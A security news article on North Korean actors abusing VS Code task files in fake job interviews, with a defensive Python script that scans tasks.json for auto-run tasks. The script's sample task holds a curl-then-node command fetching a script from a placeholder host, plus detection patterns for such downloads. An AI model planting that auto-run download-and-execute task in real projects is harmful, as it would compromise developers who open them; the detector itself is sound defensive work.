North Korean threat actors linked to the long-running Contagious Interview campaign are using malicious Microsoft Visual Studio Code (VS Code) projects to deliver backdoors capable of remote code execution, according to new findings from Jamf Threat Labs.
The campaign, initially disclosed by researchers from OpenSourceMalware, targets software developers by posing as job recruiters and instructing victims to clone repositories hosted on GitHub, GitLab, or Bitbucket as part of fake technical assessments. Once opened in VS Code, the projects abuse task configuration files to automatically execute malicious payloads (often hosted on Vercel) whenever a folder is opened, ultimately deploying malware such as BeaverTail and InvisibleFerret.
Recent variants of the attack introduce more sophisticated multi-stage droppers hidden in task files and disguised as benign spell-check dictionaries. The files execute obfuscated JavaScript as soon as the project is opened, establishing communication with attacker-controlled servers and fetching additional payloads. Jamf researchers have identified a previously undocumented infection method that delivers a backdoor via VS Code’s workspace trust mechanism, particularly affecting macOS systems.
On macOS, granting trust to the repository triggers background shell commands that silently download and execute JavaScript through Node.js, ensuring persistence even if VS Code is closed. The backdoor enables system fingerprinting, continuous beaconing, and remote command execution, with later-stage scripts designed to clean up traces of activity. Some of the code appears to have been generated using AI tools.
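As an added defender-side example (not code from the Jamf report or this article), the following Python triage script inspects a cloned repository's `.vscode/tasks.json` for tasks configured to run automatically on folder open (the `runOptions.runOn: "folderOpen"` setting that this campaign abuses) and flags the traits described above: remote fetches, Node.js execution, temp-directory staging, backgrounding and hidden terminal output. The sample `tasks.json`, its hostname and paths are constructed placeholders, not indicators from the report.

```python
import json
import re

# Constructed sample tasks.json modelled on the behaviour described above:
# a task that runs on folder open and pulls a remote script into Node.js.
# The hostname and paths are placeholders, not indicators from the report.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json is JSONC, so VS Code accepts line comments like this one
  "version": "2.0.0",
  "tasks": [{
    "label": "Spell check dictionaries",
    "type": "shell",
    "command": "curl -s https://payload.example.invalid/dict.js -o /tmp/d.js && node /tmp/d.js &",
    "runOptions": { "runOn": "folderOpen" },
    "presentation": { "reveal": "never" }
  }, {
    "label": "build", "type": "npm", "script": "build"
  }]
}'''

# Heuristics applied to the command line of each auto-run task.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"https?://"), "fetches a remote URL"),
    (re.compile(r"\b(curl|wget)\b"), "uses a downloader"),
    (re.compile(r"\bnode\b"), "executes JavaScript via Node.js"),
    (re.compile(r"/tmp/|\$TMPDIR"), "stages files in a temp directory"),
    (re.compile(r"&\s*$"), "backgrounds the process so it outlives VS Code"),
]

def load_jsonc(text: str) -> dict:
    # Simple JSONC handling: drop whole-line // comments, then parse as JSON.
    lines = [ln for ln in text.splitlines() if not ln.strip().startswith("//")]
    return json.loads("\n".join(lines))

def find_autorun_tasks(text: str) -> list[dict]:
    """Return every task set to run on folder open, with the reasons it looks suspicious."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue  # only tasks VS Code executes automatically are in scope
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(cmd)]
        if task.get("presentation", {}).get("reveal") == "never":
            reasons.append("hides its terminal output")
        findings.append({"label": task.get("label"), "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] auto-run task {f['label']!r}: {'; '.join(f['reasons'])}")
```

Any hit warrants opening the project without granting workspace trust (VS Code's Restricted Mode does not run tasks) and reviewing the task by hand before trusting the folder.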
“This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows. The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools,” the report concludes.